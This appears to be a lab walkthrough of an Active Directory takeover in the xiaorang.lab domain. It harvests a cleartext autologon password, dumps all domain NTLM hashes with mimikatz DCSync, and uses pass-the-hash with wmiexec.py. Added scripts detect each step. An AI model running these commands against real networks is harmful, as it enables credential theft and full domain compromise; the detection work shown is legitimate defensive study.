Log on to the ordinary domain machine 172.22.6.25 (WIN2019) and check who is currently logged on. Some users, for convenience, store their password and related settings in the registry so that logon runs automatically.
C:\Users\zhangxin\Desktop\hvv>quser
 用户名            会话名          ID  状态    空闲时间   登录时间
 yuxuan            console          1  运行中  无         2025/3/9 19:48
>zhangxin          rdp-tcp#1        2  运行中  .          2025/3/9 19:52

C:\Users\zhangxin\Desktop\hvv>reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoRestartShell    REG_DWORD    0x1
    Background    REG_SZ    0 0 0
    CachedLogonsCount    REG_SZ    10
    DebugServerCommand    REG_SZ    no
    DisableBackButton    REG_DWORD    0x1
    EnableSIHostIntegration    REG_DWORD    0x1
    ForceUnlockLogon    REG_DWORD    0x0
    LegalNoticeCaption    REG_SZ
    LegalNoticeText    REG_SZ
    PasswordExpiryWarning    REG_DWORD    0x5
    PowerdownAfterShutdown    REG_SZ    0
    PreCreateKnownFolders    REG_SZ    {A520A1A4-1780-4FF6-BD18-167343C5AF16}
    ReportBootOk    REG_SZ    1
    Shell    REG_SZ    explorer.exe
    ShellCritical    REG_DWORD    0x0
    ShellInfrastructure    REG_SZ    sihost.exe
    SiHostCritical    REG_DWORD    0x0
    SiHostReadyTimeOut    REG_DWORD    0x0
    SiHostRestartCountLimit    REG_DWORD    0x0
    SiHostRestartTimeGap    REG_DWORD    0x0
    Userinit    REG_SZ    C:\Windows\system32\userinit.exe,
    VMApplet    REG_SZ    SystemPropertiesPerformance.exe /pagefile
    WinStationsDisabled    REG_SZ    0
    ShellAppRuntime    REG_SZ    ShellAppRuntime.exe
    scremoveoption    REG_SZ    0
    DisableCAD    REG_DWORD    0x1
    LastLogOffEndTimePerfCounter    REG_QWORD    0xedd7ccd15
    ShutdownFlags    REG_DWORD    0x80000027
    AutoLogonSID    REG_SZ    S-1-5-21-3623938633-4064111800-2925858365-1180
    LastUsedUsername    REG_SZ    yuxuan
    AutoAdminLogon    REG_SZ    1
    DefaultUserName    REG_SZ    yuxuan
    DefaultPassword    REG_SZ    Yuxuan7QbrgZ3L
    DefaultDomainName    REG_SZ    xiaorang.lab

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey
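The registry dump above is exactly what a host audit should be looking for: AutoAdminLogon=1 next to a cleartext DefaultPassword. The following script is an added example, not code from the write-up; it parses the text `reg query` prints and reports that combination. The sample output it ships with is constructed in the same format, with a placeholder user, domain and password.

```python
"""Audit the Winlogon key for cleartext autologon credentials.

Added example (not part of the original write-up): it parses the text that
`reg query` prints and flags the combination that turns a registry key into a
credential store, AutoAdminLogon=1 together with a DefaultPassword value.
The sample output below is constructed in that format with placeholder values.
"""
import re
from typing import Dict, List

# Constructed sample in `reg query` output format; user, domain and password are placeholders.
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoRestartShell    REG_DWORD    0x1
    CachedLogonsCount    REG_SZ    10
    LegalNoticeCaption    REG_SZ
    Shell    REG_SZ    explorer.exe
    Userinit    REG_SZ    C:\Windows\system32\userinit.exe,
    AutoAdminLogon    REG_SZ    1
    DefaultUserName    REG_SZ    svc_kiosk
    DefaultPassword    REG_SZ    PLACEHOLDER-Passw0rd
    DefaultDomainName    REG_SZ    example.lab

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells
"""

# A value line is indented and reads: <name> <REG_type> [<data>].
# reg query does not quote names, so a value name containing spaces would need a different split.
VALUE_RE = re.compile(r"^\s+(\S+)\s+(REG_[A-Z_]+)\s*(.*)$")


def parse_reg_query(text: str) -> Dict[str, str]:
    """Return {value_name: data} for the value lines in reg query output.

    Unindented subkey lines (HKEY_... paths) are skipped.
    """
    values: Dict[str, str] = {}
    for line in text.splitlines():
        m = VALUE_RE.match(line)
        if m:
            name, _reg_type, data = m.groups()
            values[name] = data.strip()
    return values


def autologon_findings(values: Dict[str, str]) -> List[str]:
    """Describe why the parsed Winlogon values are a credential exposure, if they are."""
    findings: List[str] = []
    auto = values.get("AutoAdminLogon", "0").strip() == "1"
    user = values.get("DefaultUserName", "?")
    domain = values.get("DefaultDomainName", "?")
    password = values.get("DefaultPassword", "")
    if password:
        # This key is readable by standard local users by default, so the value is not a secret.
        findings.append(f"DefaultPassword stored in cleartext for {domain}\\{user}")
    if auto and password:
        findings.append("AutoAdminLogon=1 with cleartext DefaultPassword: rotate the "
                        "password and remove the value (or keep it only as an LSA secret)")
    elif auto:
        findings.append("AutoAdminLogon=1 without DefaultPassword: the password may be "
                        "held in the LSA secret 'DefaultPassword'; review that as well")
    return findings


def is_exposed(text: str) -> bool:
    """True when reg query output shows an autologon password in cleartext."""
    values = parse_reg_query(text)
    return values.get("AutoAdminLogon", "").strip() == "1" and bool(values.get("DefaultPassword"))


if __name__ == "__main__":
    for finding in autologon_findings(parse_reg_query(SAMPLE_REG_OUTPUT)):
        print("[!]", finding)
```

Feed it the saved output of `reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"` from each host and alert on `is_exposed()`; the finding text is what goes into the ticket for the owner of the machine.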
BloodHound
A direct dcsync is enough to take over the domain controller.
Domain controller
dcsync
C:\Users\yuxuan\Desktop\hvv>mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 02:01:23
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # lsadump::dcsync /domain:xiaorang.lab /all /csv
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC-PROGAME.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
1103    shuzhen    07c1f387d7c2cf37e0ca7827393d2327    512
1104    gaiyong    52c909941c823dbe0f635b3711234d2e    512
1106    xiqidi    a55d27cfa25f3df92ad558c304292f2e    512
1107    wengbang    6b1d97a5a68c6c6c9233d11274d13a2e    512
1108    xuanjiang    a72a28c1a29ddf6509b8eabc61117c6c    512
1109    yuanchang    e1cea038f5c9ffd9dc323daf35f6843b    512
1110    lvhui    f58b31ef5da3fc831b4060552285ca54    512
1111    wenbo    9abb7115997ea03785e92542f684bdde    512
1112    zhenjun    94c84ba39c3ece24b419ab39fdd3de1a    512
1113    jinqing    4bf6ad7a2e9580bc8f19323f96749b3a    512
1115    yangju    1fa8c6b4307149415f5a1baffebe61cf    512
1117    weicheng    796a774eace67c159a65d6b86fea1d01    512
1118    weixian    8bd7dc83d84b3128bfbaf165bf292990    512
1119    haobei    045cc095cc91ba703c46aa9f9ce93df1    512
1120    jizhen    1840c5130e290816b55b4e5b60df10da    512
1121    jingze    3c8acaecc72f63a4be945ec6f4d6eeee    512
1122    rubao    d8bd6484a344214d7e0cfee0fa76df74    512
1123    zhaoxiu    694c5c0ec86269daefff4dd611305fab    512
1124    tangshun    90b8d8b2146db6456d92a4a133eae225    512
1125    liangliang    c67cd4bae75b82738e155df9dedab7c1    512
1126    qiyue    b723d29e23f00c42d97dd97cc6b04bc8    512
1127    chouqian    c6f0585b35de1862f324bc33c920328d    512
1128    jicheng    159ee55f1626f393de119946663a633c    512
1129    xiyi    ee146df96b366efaeb5138832a75603b    512
1130    beijin    a587b90ce9b675c9acf28826106d1d1d    512
1131    chenghui    08224236f9ddd68a51a794482b0e58b5    512
1132    chebin    b50adfe07d0cef27ddabd4276b3c3168    512
1133    pengyuan    a35d8f3c986ab37496896cbaa6cdfe3e    512
1134    yanglang    91c5550806405ee4d6f4521ba6e38f22    512
1135    jihuan    cbe4d79f6264b71a48946c3fa94443f5    512
1136    duanmuxiao    494cc0e2e20d934647b2395d0a102fb0    512
1137    hongzhi    f815bf5a1a17878b1438773dba555b8b    512
1138    gaijin    b1040198d43631279a63b7fbc4c403af    512
1139    yifu    4836347be16e6af2cd746d3f934bb55a    512
1140    fusong    adca7ec7f6ab1d2c60eb60f7dca81be7    512
1141    luwan    c5b2b25ab76401f554f7e1e98d277a6a    512
1142    tangrong    2a38158c55abe6f6fe4b447fbc1a3e74    512
1143    zhufeng    71e03af8648921a3487a56e4bb8b5f53    512
1145    dongcheng    f2fdf39c9ff94e24cf185a00bf0a186d    512
1146    lianhuangchen    23dc8b3e465c94577aa8a11a83c001af    512
1147    lili    b290a36500f7e39beee8a29851a9f8d5    512
1148    huabi    02fe5838de111f9920e5e3bb7e009f2f    512
1149    rangsibo    103d0f70dc056939e431f9d2f604683c    512
1150    wohua    cfcc49ec89dd76ba87019ca26e5f7a50    512
1151    haoguang    33efa30e6b3261d30a71ce397c779fda    512
1152    langying    52a8a125cd369ab16a385f3fcadc757d    512
1153    diaocai    a14954d5307d74cd75089514ccca097a    512
1154    lianggui    4ae2996c7c15449689280dfaec6f2c37    512
1155    manxue    0255c42d9f960475f5ad03e0fee88589    512
1156    baqin    327f2a711e582db21d9dd6d08f7bdf91    512
1157    chengqiu    0d0c1421edf07323c1eb4f5665b5cb6d    512
1158    louyou    a97ba112b411a3bfe140c941528a4648    512
1159    maqun    485c35105375e0754a852cee996ed33b    512
1160    wenbiao    36b6c466ea34b2c70500e0bfb98e68bc    512
1161    weishengshan    f60a4233d03a2b03a7f0ae619c732fae    512
1163    chuyuan    0cfdca5c210c918b11e96661de82948a    512
1164    wenliang    a4d2bacaf220292d5fdf9e89b3513a5c    512
1165    yulvxue    cf970dea0689db62a43b272e2c99dccd    512
1166    luyue    274d823e941fc51f84ea323e22d5a8c4    512
1167    ganjian    7d3c39d94a272c6e1e2ffca927925ecc    512
1168    pangzhen    51d37e14983a43a6a45add0ae8939609    512
1169    guohong    d3ce91810c1f004c782fe77c90f9deb6    512
1170    lezhong    dad3990f640ccec92cf99f3b7be092c7    512
1171    sheweiyue    d17aecec7aa3a6f4a1e8d8b7c2163b35    512
1172    dujian    8f7846c78f03bf55685a697fe20b0857    512
1173    lidongjin    34638b8589d235dea49e2153ae89f2a1    512
1174    hongqun    6c791ef38d72505baeb4a391de05b6e1    512
1175    yexing    34842d36248c2492a5c9a1ae5d850d54    512
1176    maoda    6e65c0796f05c0118fbaa8d9f1309026    512
1177    qiaomei    6a889f350a0ebc15cf9306687da3fd34    512
502    krbtgt    a4206b127773884e2c7ea86cdd282d9c    514
1178    wenshao    b31c6aa5660d6e87ee046b1bb5d0ff79    4260352
500    Administrator    04d93ffd6f5f6e4490e0de23f240a5e9    512
1000    DC-PROGAME$    2f942cc8e98e9690c56d280c5604e696    532480
1179    zhangxin    d6c5976e07cdb410be19b84126367e3d    4260352
1181    WIN2019$    02d6f2c5b28d43abcc6751712c77c4c8    4096
1180    yuxuan    376ece347142d1628632d440530e8eed    66048
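From the blue-team side, the `lsadump::dcsync` run above is visible on the domain controller: with "Audit Directory Service Access" enabled, each replication request produces Security event 4662 whose Properties list the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All control access rights. Domain controllers request these from each other constantly; a user account such as yuxuan doing so is the signal. The script below is an added example, not part of the write-up. Its events are constructed, simplified key=value renderings of 4662/4624 rather than exported logs, and the DC inventory (DC-PROGAME$, the DC named in the dcsync output) is an assumption.

```python
"""Flag DCSync-style replication requests in Security event 4662.

Added example, not from the original write-up. The events below are
constructed key=value renderings of 4662/4624 with the fields a real event
carries; KNOWN_DC_ACCOUNTS is an assumed inventory.
"""
from typing import Dict, List

# Control-access-right GUIDs that appear in the Properties field of 4662 on replication requests.
DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"

# Computer accounts allowed to replicate (assumed inventory; DC-PROGAME$ is the DC in the write-up).
KNOWN_DC_ACCOUNTS = {"DC-PROGAME$"}

SAMPLE_EVENTS = [
    # Legitimate replication between domain controllers.
    "EventID=4662 SubjectUserName=DC-PROGAME$ SubjectDomainName=XIAORANG ObjectType=domainDNS "
    f"Properties={{{DS_REPL_GET_CHANGES}}};{{{DS_REPL_GET_CHANGES_ALL}}}",
    # A user account requesting the same rights: the DCSync pattern.
    "EventID=4662 SubjectUserName=yuxuan SubjectDomainName=XIAORANG ObjectType=domainDNS "
    f"Properties={{{DS_REPL_GET_CHANGES}}};{{{DS_REPL_GET_CHANGES_ALL}}}",
    # Ordinary object access by the same user with a constructed, non-replication right GUID.
    "EventID=4662 SubjectUserName=yuxuan SubjectDomainName=XIAORANG ObjectType=user "
    "Properties={00000000-0000-0000-0000-00000000cafe}",
    # Unrelated event ID, must be ignored.
    "EventID=4624 SubjectUserName=zhangxin LogonType=10",
]


def parse_event(line: str) -> Dict[str, str]:
    """Split 'k=v k=v ...' into a dict (values in this rendering contain no spaces)."""
    fields: Dict[str, str] = {}
    for token in line.split():
        key, _, value = token.partition("=")
        fields[key] = value
    return fields


def requests_replication(event: Dict[str, str]) -> bool:
    """True for a 4662 whose Properties carry either directory-replication right."""
    if event.get("EventID") != "4662":
        return False
    props = event.get("Properties", "").lower()
    return DS_REPL_GET_CHANGES_ALL in props or DS_REPL_GET_CHANGES in props


def suspicious_dcsync(lines: List[str]) -> List[Dict[str, str]]:
    """Replication requests whose subject is not a known DC computer account."""
    hits: List[Dict[str, str]] = []
    for line in lines:
        ev = parse_event(line)
        if requests_replication(ev) and ev.get("SubjectUserName") not in KNOWN_DC_ACCOUNTS:
            hits.append(ev)
    return hits


if __name__ == "__main__":
    for hit in suspicious_dcsync(SAMPLE_EVENTS):
        print(f"[!] replication request by {hit['SubjectDomainName']}\\{hit['SubjectUserName']} "
              f"on {hit['ObjectType']}")
```

The allow-list is the important part: without it every inter-DC replication fires, and with it the only remaining false positives are non-DC accounts that legitimately hold replication rights (for example Azure AD Connect), which belong in KNOWN_DC_ACCOUNTS too. Because the DCSync run was preceded by the WIN2019 account creds above, a second correlation worth keeping is 4662 with these GUIDs from a subject that logged on interactively on a workstation minutes earlier.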
Pass-the-hash
proxychains python3 wmiexec.py xiaorang/administrator@172.22.6.25 -hashes :04d93ffd6f5f6e4490e0de23f240a5e9
proxychains python3 wmiexec.py xiaorang/administrator@172.22.6.12 -hashes :04d93ffd6f5f6e4490e0de23f240a5e9
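The wmiexec.py pass-the-hash step leaves two well-known traces on the target: a Security 4624 network logon (LogonType 3) authenticated with NTLM as the administrator account, and WmiPrvSE.exe spawning cmd.exe whose command line redirects output into `\\127.0.0.1\ADMIN$\__<timestamp>`, the output-capture pattern impacket's wmiexec.py uses by default. The script below is an added example, not part of the write-up, and checks both. All events are constructed dicts carrying the field names of 4624 and Sysmon event 1; the IP addresses and the admin-host allow-list are placeholders.

```python
"""Two log checks for wmiexec-style lateral movement after pass-the-hash.

Added example, not from the original write-up. Events are constructed dicts
with 4624 / Sysmon event 1 field names; addresses and the allow-list of
admin source hosts are placeholders.
"""
import re
from typing import Dict, Iterable, List, Set

Event = Dict[str, object]

SAMPLE_EVENTS: List[Event] = [
    # NTLM network logon as Administrator from an address that is not an admin host.
    {"EventID": 4624, "TargetUserName": "Administrator", "TargetDomainName": "XIAORANG",
     "LogonType": 3, "AuthenticationPackageName": "NTLM", "IpAddress": "172.22.6.36"},
    # Same account and package from the designated admin jump host: expected.
    {"EventID": 4624, "TargetUserName": "Administrator", "TargetDomainName": "XIAORANG",
     "LogonType": 3, "AuthenticationPackageName": "NTLM", "IpAddress": "172.22.6.200"},
    # Kerberos network logon by the admin account: not the pass-the-hash shape.
    {"EventID": 4624, "TargetUserName": "Administrator", "TargetDomainName": "XIAORANG",
     "LogonType": 3, "AuthenticationPackageName": "Kerberos", "IpAddress": "172.22.6.36"},
    # Interactive RDP logon by a normal user: ignored.
    {"EventID": 4624, "TargetUserName": "zhangxin", "TargetDomainName": "XIAORANG",
     "LogonType": 10, "AuthenticationPackageName": "Negotiate", "IpAddress": "172.22.6.30"},
    # Sysmon event 1: WMI provider host spawning cmd.exe with wmiexec's output redirection.
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1741507200.123 2>&1"},
    # Sysmon event 1: WMI provider host running an ordinary script: ignored.
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "cmd.exe /c ipconfig /all"},
]

# Output file wmiexec.py writes on the target's ADMIN$ share: "__" followed by a Unix timestamp.
WMIEXEC_OUTPUT_RE = re.compile(r"\\\\127\.0\.0\.1\\ADMIN\$\\__\d+(?:\.\d+)?")


def ntlm_admin_logons(events: Iterable[Event], admin_accounts: Set[str],
                      admin_sources: Set[str]) -> List[Event]:
    """4624 network logons (type 3) with NTLM for a high-value account from an unexpected source."""
    hits: List[Event] = []
    for ev in events:
        if ev.get("EventID") != 4624 or ev.get("LogonType") != 3:
            continue
        if str(ev.get("AuthenticationPackageName", "")).upper() != "NTLM":
            continue
        if str(ev.get("TargetUserName", "")).lower() not in admin_accounts:
            continue
        if ev.get("IpAddress") in admin_sources:
            continue
        hits.append(ev)
    return hits


def wmiexec_process_hits(events: Iterable[Event]) -> List[Event]:
    """Sysmon process-creation events matching the wmiexec.py parent/child/command-line shape."""
    hits: List[Event] = []
    for ev in events:
        if ev.get("EventID") != 1:
            continue
        parent = str(ev.get("ParentImage", "")).lower()
        image = str(ev.get("Image", "")).lower()
        if not (parent.endswith("wmiprvse.exe") and image.endswith("cmd.exe")):
            continue
        if WMIEXEC_OUTPUT_RE.search(str(ev.get("CommandLine", ""))):
            hits.append(ev)
    return hits


if __name__ == "__main__":
    for ev in ntlm_admin_logons(SAMPLE_EVENTS, {"administrator"}, {"172.22.6.200"}):
        print(f"[!] NTLM network logon as {ev['TargetUserName']} from {ev['IpAddress']}")
    for ev in wmiexec_process_hits(SAMPLE_EVENTS):
        print(f"[!] wmiexec-style process: {ev['CommandLine']}")
```

The logon check on its own is noisy on networks where NTLM is still routine, which is why it is gated on the account list and a source allow-list; the process check is far more specific and, on a host where it fires, the matching 4624 tells you which hash was replayed and from where. The longer-term fix the output above argues for is the same either way: the Administrator hash works on every machine in the domain, so tiering admin accounts and restricting NTLM matter more than any single rule.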